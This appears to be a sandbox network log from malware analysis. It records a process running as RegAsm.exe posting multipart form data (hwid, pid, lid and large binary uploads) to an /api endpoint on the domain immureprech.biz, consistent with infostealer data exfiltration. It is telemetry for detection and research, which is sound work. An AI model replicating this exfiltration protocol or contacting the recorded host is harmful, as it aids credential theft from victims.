2024-12-12 16:34:02 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C3LWZ7G84HI7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 10903 Host: immureprech.biz
2024-12-12 16:34:02 UTC	10903	OUT	Data Raw: 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d Data Ascii: --C3LWZ7G84HI7Content-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--C3LWZ7G84HI7Content-Disposition: form-data; name="pid"2--C3LWZ7G84HI7Content-Disposition: form-data; name="lid"DUkgLv--EBALAY--C3LWZ7G84HI7
2024-12-12 16:34:02 UTC	1018	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ivsg9p0q0qlkd576n4k33kqrhg; expires=Mon, 07-Apr-2025 10:20:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQuDGiXDgy%2BxFAgx4sG1djHBADuSUkLpb29tUFZfOrNETAtsuaOokbosUvpE79ZchTiCCQ8%2BTGJHOHEOrre36zN8TOSnMVjll%2Fhwd2MGQUVkKLGprdwrg7jraAnSxffKvkE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1e9b3bb7ed8c-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=113884&min_rtt=113851&rtt_var=24068&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2838&recv_bytes=11836&delivery_rate=33614&cwnd=252&unsent_bytes=0&cid=0a7d227e3ea3176c&ts=905&x=0"
2024-12-12 16:34:02 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a Data Ascii: 11ok 89.187.171.165
2024-12-12 16:34:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49715	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:34:03 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UADEEVLT2A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20520 Host: immureprech.biz
2024-12-12 16:34:03 UTC	15331	OUT	Data Raw: 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --UADEEVLT2AContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--UADEEVLT2AContent-Disposition: form-data; name="pid"3--UADEEVLT2AContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--UADEEVLT2AContent
2024-12-12 16:34:03 UTC	5189	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc a6 e8 30 bd ee bb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: \ot^:):Ln`X6Eusazw0
2024-12-12 16:34:03 UTC	1019	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=svf0trpi7elchsbfns0ambpdo6; expires=Mon, 07-Apr-2025 10:20:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9lDYun3iDipyVKsOphICyNiSocf5nbSIdJIGQsZyt1ASnZ%2BWTNISj6qMsAHO73elxLF3eoo8tMTBN1P18ZC7AAgnIcO03yCmKI%2BIBinqZcJTFXfZfOaIg4MrPHrw87g%2FS1A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1ea2ba3abce6-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=114099&min_rtt=114028&rtt_var=24164&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21473&delivery_rate=33527&cwnd=251&unsent_bytes=0&cid=0f5fe9049caaf1e2&ts=669&x=0"
2024-12-12 16:34:03 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a Data Ascii: 11ok 89.187.171.165
2024-12-12 16:34:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49716	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:34:04 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2L142YZ0IX4WKD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1256 Host: immureprech.biz
2024-12-12 16:34:04 UTC	1256	OUT	Data Raw: 2d 2d 32 4c 31 34 32 59 5a 30 49 58 34 57 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 32 4c 31 34 32 59 5a 30 49 58 34 57 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4c 31 34 32 59 5a 30 49 58 34 57 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 32 4c 31 34 32 59 5a Data Ascii: --2L142YZ0IX4WKDContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--2L142YZ0IX4WKDContent-Disposition: form-data; name="pid"1--2L142YZ0IX4WKDContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--2L142YZ
2024-12-12 16:34:04 UTC	1020	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8eilbk0fe3iukfivjf5lcs5rdr; expires=Mon, 07-Apr-2025 10:20:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5x5Awmi1LyJB2C9LkRufOrBC5NygL1w0E5%2FQuUBIfEk2a27CddywkVVueOHgluCF%2BdrAazrblAHtlP%2BbbAM63lYd4MwEDNpUAj3r0kY05nTXfS3eFC4i%2F%2FF14xl8tgNWqA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1ea90f703be7-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=123631&min_rtt=123328&rtt_var=26271&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2168&delivery_rate=31029&cwnd=252&unsent_bytes=0&cid=a6f8f17244477c45&ts=627&x=0"
2024-12-12 16:34:04 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a Data Ascii: 11ok 89.187.171.165
2024-12-12 16:34:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49717	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:34:05 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QOGKQY9Z8PPSYK8T User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1047224 Host: immureprech.biz
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 2d 2d 51 4f 47 4b 51 59 39 5a 38 50 50 53 59 4b 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 51 4f 47 4b 51 59 39 5a 38 50 50 53 59 4b 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 4f 47 4b 51 59 39 5a 38 50 50 53 59 4b 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 51 Data Ascii: --QOGKQY9Z8PPSYK8TContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--QOGKQY9Z8PPSYK8TContent-Disposition: form-data; name="pid"1--QOGKQY9Z8PPSYK8TContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--Q
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: b8 c2 b4 4a 71 11 ba 7a fd a5 e2 a6 68 70 f1 a9 61 32 b5 0f a4 72 60 6d bd e2 57 86 ee 75 cb 6a 10 f5 24 43 38 e1 19 02 9f 9e 52 17 e1 b1 f4 c5 f0 be 09 84 31 b4 7b 74 48 a0 80 8a b3 1a 7b 0d c1 98 76 ea c8 1e b1 45 15 b9 41 52 7b 14 b7 e1 8a 6d e8 ed c6 84 ed 84 77 01 c3 4d e1 a2 61 be e1 52 8b a2 36 79 23 b7 1e ec f0 a1 71 92 2e 9b 17 b0 6d 5f ee 94 68 3e 9d 98 94 df b4 83 03 5c 2a 03 c1 22 c6 d7 7c 6f 5d f8 e6 a6 f6 76 e7 e7 e6 eb 92 f2 f8 16 b5 35 8d fc 3f 80 0a b5 ad 1b eb 5f 20 87 9c 32 d1 fc 3e 28 5e b2 5b 8a b7 02 25 14 9c 95 6a 40 e0 ad 2e 59 60 97 ee 1c 85 f6 00 bc db 99 7f 00 5b 7d 0b 8d 39 7b a0 e4 0d 19 11 20 a1 04 4e 4d c8 02 d8 be 4d 00 2f 83 76 08 d8 4a 81 e2 29 ce 2d bf 9a 90 c1 97 80 ec e1 d9 2c f4 5f 00 ef 65 96 a8 f0 d6 35 b4 b0 b9 c0 Data Ascii: Jqzhpa2r`mWuj$C8R1{tH{vEAR{mwMaR6y#q.m_h>\*"\|o]v5?_ 2>(^[%j@.Y`[}9{ NMM/vJ)-,_e5
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: e1 2b 42 cc 8f 03 88 1f 30 e6 e8 a2 93 20 c8 f8 bd 48 f3 47 ae ca be f4 b2 75 cb c9 56 fe 0e 11 a7 db 6d 3f 55 6b a5 cc e2 fa ee 51 f2 7d a3 7a 2d 0f 56 d6 86 ce 6b 69 bf d0 e1 9a df 90 58 3c 56 9f f6 82 93 d6 83 52 fd 30 b8 8f cb 74 48 73 cf dc 4e d2 3c 96 61 71 9f 20 a8 db 2a 64 6b 14 5e cf 6b d6 34 1e 46 b5 f6 5c 78 eb a5 c3 81 2c 0f 8d 65 c5 4d 90 96 45 12 ee e1 e0 bc 05 8d 41 fd 0b e9 97 86 9b c2 c5 6c e5 f5 9e 87 02 5b b6 56 09 cd 48 20 7e c9 c8 a9 02 4c 9d 63 f5 6f 9d 37 f2 5e da ed 1c f3 85 01 bb 56 87 2c df f5 40 18 7d 16 78 04 97 d5 62 fb af af 92 d5 5a 2a 14 2f 59 a1 d6 24 2a c0 dc e3 42 c6 10 c6 a2 65 f6 3e 76 75 a3 24 9b 2e 20 df 7d ba 00 b9 11 4e a5 6c 77 31 c1 8c 1b fe b5 20 b6 b4 ed 1a 98 41 77 ff db 62 75 5d b5 74 6c 37 f4 f5 e5 b8 f8 d0 Data Ascii: +B0 HGuVm?UkQ}z-VkiX<VR0tHsN<aq dk^k4F\x,eMEAl[VH ~Lco7^V,@}xbZ/Y$*Be>vu$. }Nlw1 Awbu]tl7
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 3f 17 83 e2 86 37 78 b7 bb da 35 70 6d 44 66 f7 f1 19 15 7f af 7d 06 be a2 0f 24 7e 12 1f 64 1d 35 33 6e 0d 29 49 22 50 ae 96 10 2c 4a 03 6b 02 c0 d7 67 60 3d 4c af b8 7e 80 bd cb 0d de f1 d6 dd da 66 a4 a3 15 13 be bf a2 65 12 9b 36 06 57 d2 8d 12 2a 4a b5 82 1b c3 b6 a6 dc c8 c7 2d 17 37 89 44 45 80 f2 fd 94 91 da 73 20 f2 e9 a6 3c b0 65 35 69 41 e6 23 88 79 8e 00 7d 18 82 0f 2e 10 c7 27 38 02 6c 75 4b 3c c0 4e 50 a5 e3 d0 10 3c ab b1 be 3e a8 69 ee fe ca 47 64 14 8d 17 6c 67 19 16 3b 13 46 37 89 ef 09 b6 08 db 62 ef b2 d9 6a 4d b3 77 d2 33 e3 78 61 1d c1 91 ed b0 e9 2b 05 b8 11 5e 20 6d fb 1b 6f 7a 36 f6 ad fc 4e 04 c0 13 0f 56 01 d8 00 7e 8c 14 fc b7 38 d4 4e 6a 5c 28 39 a5 cd f1 f3 5e 4b d6 e4 ca e0 6a bc f9 e4 ad e5 89 e9 97 61 f1 35 92 c2 1e 17 6d Data Ascii: ?7x5pmDf}$~d53n)I"P,Jkg`=L~fe6W*J-7DEs <e5iA#y}.'8luK<NP<>iGdlg;F7bjMw3xa+^ moz6NV~8Nj\(9^Kja5m
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 11 bb f1 ec 11 fb e5 f8 f9 47 0e 64 a3 8a 04 b4 b9 ff 0c ef 50 cc f9 eb 5c 49 bf cb a2 21 6f 43 1d 05 85 d1 43 0b 08 a4 ce 05 a6 61 4f 51 01 76 47 b7 0b 15 4f 56 8f fc 64 5f ff 3e de 69 b3 d3 e3 ba 22 09 c0 0f ef 5b b0 6b d3 8b 53 d7 83 b2 54 2d df 10 4e 5c 0d de b5 ef f0 62 bc 4b c2 1d 1e 8f 55 e8 f0 70 e7 61 0e 93 15 d2 cb 46 4c 98 e7 3b d9 49 3d ae c0 f8 8d 9d 37 0b 65 d8 18 57 31 ae 5a 68 97 b4 af 45 00 3e 7d de 03 44 c6 0f 1a 80 3d 82 fe 76 68 ca 34 a5 75 d5 39 a7 dc 6e c7 fb f4 98 cd 6c 8e 65 57 f7 1f 7b 56 5b 85 13 05 4a 96 aa 5c ce 1f 29 95 0f 43 78 e9 7f f2 78 1f 79 7d 4a 12 97 dc 2c e4 58 36 95 5c a3 c5 dc 2a ac ed 78 a7 2b e1 94 a0 6b 53 1e 78 c6 cf 44 a6 9b d2 e5 39 b7 0f 0e eb e0 e5 29 85 c7 d6 4a ef 3c d1 64 99 59 0f 51 b8 8c 43 08 7e b1 e4 Data Ascii: GdP\I!oCCaOQvGOVd_>i"[kST-N\bKUpaFL;I=7eW1ZhE>}D=vh4u9nleW{V[J\)Cxxy}J,X6\*x+kSxD9)J<dYQC~
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 75 76 a7 2a 7d af 5d ac fd e2 4a e6 37 be a0 57 53 43 b9 f3 0e 85 f4 dd 58 b0 f1 4d 20 98 4e 68 d8 36 cf dd a2 1b 1f df fb dc f2 d6 ba 68 93 78 f5 0c 35 f3 99 d5 70 d7 5e ff 7f 26 98 47 a2 34 4b fd c8 d7 89 b4 44 e4 65 d9 2b f2 50 ee 73 c7 35 3d 49 91 09 1e 45 d0 ee ae b7 3d 17 d9 09 b5 be 8d e7 36 f5 db 6c 2c 1c b6 6b 1d 37 70 e3 c6 6c 51 af 04 fc 4f d3 f6 ef 61 45 ff ce c7 81 1c 02 18 b2 91 64 bc 15 19 de 9b 21 c8 1c a4 67 ab 86 3d 99 c7 e5 2c ae da ba d9 68 6c 17 9c de ab b9 aa e4 01 19 b5 02 b2 02 58 e0 d0 56 9e e9 62 5e d5 7d af 7f c0 23 5d 5e ab f1 72 4b f6 84 09 25 78 2f 74 d7 8a 0a 7a 29 a4 9c 77 5b 85 ef 0a 30 d1 ba 61 81 05 b8 de dd 38 1b c4 74 90 74 1c a1 52 93 80 33 b2 c9 f8 7c bc 5e 94 1a ee 87 39 c7 54 3e c4 56 cd 80 2c 98 7e 8f 93 e3 f5 54 Data Ascii: uv*}]J7WSCXM Nh6hx5p^&G4KDe+Ps5=IE=6l,k7plQOaEd!g=,hlXVb^}#]^rK%x/tz)w[0a8ttR3\|^9T>V,~T
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 41 86 72 10 ea 21 60 e4 87 26 d9 c8 4f eb 99 44 24 2d 74 fa 7b 36 54 48 2f 2a 12 0e ec 8b c3 16 89 d0 cc a2 9e fc f4 bd 6e 71 d7 0e d0 96 15 3d 58 a2 0c 40 12 14 66 97 82 da 2b 80 d0 f1 9d cc 1d 4a 7d 22 a1 a1 dd 2c e4 5d f4 5d f6 05 9b 10 cb f5 7b 32 60 0d c0 eb 0f 02 85 78 97 8a 47 66 d1 cc 12 04 37 2e da 40 62 c3 f9 f3 00 7c fb 74 51 3f c3 0a 39 38 54 14 f6 fd f8 50 37 85 99 1f 79 f1 28 92 b4 2a 91 f8 28 91 48 20 ed ef ed 01 dd c2 19 2e 0f 36 67 b2 18 b5 33 0b 9c aa 4e 46 ad 5f 4e df 5c 66 9e c9 54 ee aa 45 33 86 69 7e e7 ea dc 8e b4 ef 5e 48 04 0f 1c fc 24 7a 20 fc d8 ae 12 90 2a a7 28 6e a1 07 56 66 84 b4 7c 3b 94 e6 3f 6b ba bf 17 fc f5 39 be 36 4c c4 d8 e6 c7 24 3c 28 57 32 7e 11 24 fa dd fe 4d 8e c6 4a ef 63 e7 68 bc 46 68 cf c7 b7 a8 8e b9 ed f0 Data Ascii: Ar!`&OD$-t{6TH/nq=X@f+J}",]]{2`xGf7.@b\|tQ?98TP7y((H .6g3NF_N\fTE3i~^H$z *(nVf\|;?k96L$<(W2~$MJchFh
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 23 3b b5 50 da f2 96 2d e9 a8 0b cb fd a2 0d 2c 8a 1d 01 d0 81 b6 35 b1 a3 cb a8 93 af 43 eb 1f 60 83 75 24 62 5e 2c 8d 9b 89 8e 18 b6 1f 1b a9 23 54 8d 32 23 04 5f 76 29 e2 b3 ba b6 6e 64 15 d9 c8 32 71 ff 76 58 d1 05 31 0c 2c 69 bf 8f ba be b0 b9 22 ca a6 97 f8 c4 c4 43 9b c6 cc 07 a1 1e ed 65 0f f0 a2 db 60 bc c2 c8 2e e2 ef cc f4 8a 87 2a 1b 86 8c 83 e2 57 0e ae c9 50 2a e6 77 a1 e2 c2 ab 9c 6c 34 59 46 66 44 b2 53 13 88 3e 6f 1e 25 09 b3 36 f8 b8 02 5f 8f 7d 06 83 13 9c 34 86 f7 a6 28 a2 be 18 70 26 18 9a b2 b5 e1 00 f6 98 a8 9b 98 3e d9 99 ad 17 da 5b 9f f8 07 c6 1e 68 7c a6 88 b6 09 87 f8 fc 28 30 19 57 8d c9 e8 25 28 58 e1 81 ca 01 ae 64 54 b8 04 47 94 e7 69 96 82 c6 64 3d 75 c5 bd 7f 7c 93 d1 9f 91 9a ef fc b6 73 68 16 25 c2 6a 83 06 6e 1b 04 b3 Data Ascii: #;P-,5C`u$b^,#T2#_v)nd2qvX1,i"Ce`.WPwl4YFfDS>o%6_}4(p&>[h\|(0W%(XdTGid=u\|sh%jn
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 11 88 d4 bf eb e5 e6 64 04 4c b8 7b 5b 01 0d 32 e0 9c f8 3e 71 7a a9 35 99 00 a2 4e 70 c0 b4 f0 7b 19 21 25 95 02 0d 6a 99 a1 c7 21 ef 13 ac 08 48 0e 26 6c f5 a0 54 96 be 64 fc 8c 82 0a c0 1b 21 10 1b 6b 4c 96 fb d3 93 d6 d3 ac 53 00 92 1c 9f 2e ae 4b ad ff a4 16 f7 b5 16 5a 71 58 7a 8d 17 b7 f5 6e e6 66 5c 44 b8 e8 28 bd 02 9a a8 12 a6 f1 b9 2c 83 70 54 e8 d9 5b 26 b6 b6 27 c6 3c 09 1d 5a 22 e5 1b 31 bf f6 cb 64 18 6b 0e e5 37 7d 7a 21 53 5f 88 ba 89 c7 fd bc b8 89 75 53 08 86 dd ea 3f 60 f2 1a da 0a be 81 e3 de 86 6f 5a 1d be 16 cd 1d b6 62 ad 3a b5 98 05 35 ee 25 70 0b 04 1a 88 f0 18 fe 19 78 be 43 bf 50 2c 9f b0 ac df 6b 1f 3b 9f 63 cf 86 8f 53 ea 13 f3 34 64 61 31 41 e6 e9 9a 35 57 3b 8f 32 42 7c 41 55 0f 86 b6 24 51 06 30 3b 61 e6 fb ac 5a 1c 65 4d Data Ascii: dL{[2>qz5Np{!%j!H&lTd!kLS.KZqXznf\D(,pT[&'<Z"1dk7}z!S_uS?`oZb:5%pxCP,k;cS4da1A5W;2B\|AU$Q0;aZeM
2024-12-12 16:34:05 UTC	15331	OUT	Data Raw: 27 d5 ff 31 64 7f 84 61 91 70 b2 73 93 f8 6a cc b6 1f 12 37 cb 3f f8 39 ff af 67 7c fe c7 11 ea 6a 37 f3 1f 8e 8e de 2b 8e 50 86 90 99 60 26 91 2d b6 7f eb ef 6c 5e d2 02 24 b8 7c 26 89 51 6b d1 5b 67 6d d1 6b 05 24 8c 2a 00 07 a5 af 01 71 ab 10 55 40 75 b9 71 fb 14 bd 00 44 29 f5 6e 3a ce 04 ef c6 18 8c b9 b9 84 5e 1a 70 6c 2b 5d 25 f0 65 ff 87 91 8d 83 59 31 90 89 45 29 20 c7 a0 3e 2b b2 c2 ef 99 e5 a6 5e b8 9a 34 dc e9 a3 ba b2 cd cd f5 25 d1 f7 6d d6 01 39 fd f3 7b 69 e4 d0 4a df 30 29 6a 5f 35 6c c5 71 ee 63 f9 9b e4 c4 bc 67 dc ef 26 0f 22 cf 1c 93 68 91 bd 9a 40 74 33 f0 1f fc 36 f1 af b5 51 08 6b 51 03 a8 33 88 b2 07 a8 16 3f 1a 32 52 8a 76 09 68 a7 8e fb 1c 0b 95 6a 1c d6 d3 65 55 02 36 bc e1 11 a0 fe 72 0a e5 52 e6 b2 c6 5a be 61 89 aa ec d1 df Data Ascii: '1dapsj7?9g\|j7+P`&-l^$\|&Qk[gmk$*qU@uqD)n:^pl+]%eY1E) >+^4%m9{iJ0)j_5lqcg&"h@t36QkQ3?2RvhjeU6rRZa
2024-12-12 16:34:08 UTC	1028	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s50t1paosn5utt1iuinhqvc9se; expires=Mon, 07-Apr-2025 10:20:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DyF93f%2B%2FjFX1R11q7q7khzQdn8rtVS7L%2BPdqDBWyC9MEKPvekrhMZyK6n3QsOKrmRNyvcpi3%2BogCKx9oVBU4kmbT3mTd1ro7IuEbAH%2BxPupQ1VJ9fLOCtVnjHo61hM8VsbI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1eb1185e69f2-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=114131&min_rtt=114078&rtt_var=24152&sent=473&recv=831&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1051133&delivery_rate=33517&cwnd=252&unsent_bytes=0&cid=0f4bfa0967de3b77&ts=2802&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49718	172.67.207.38	443	1848	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
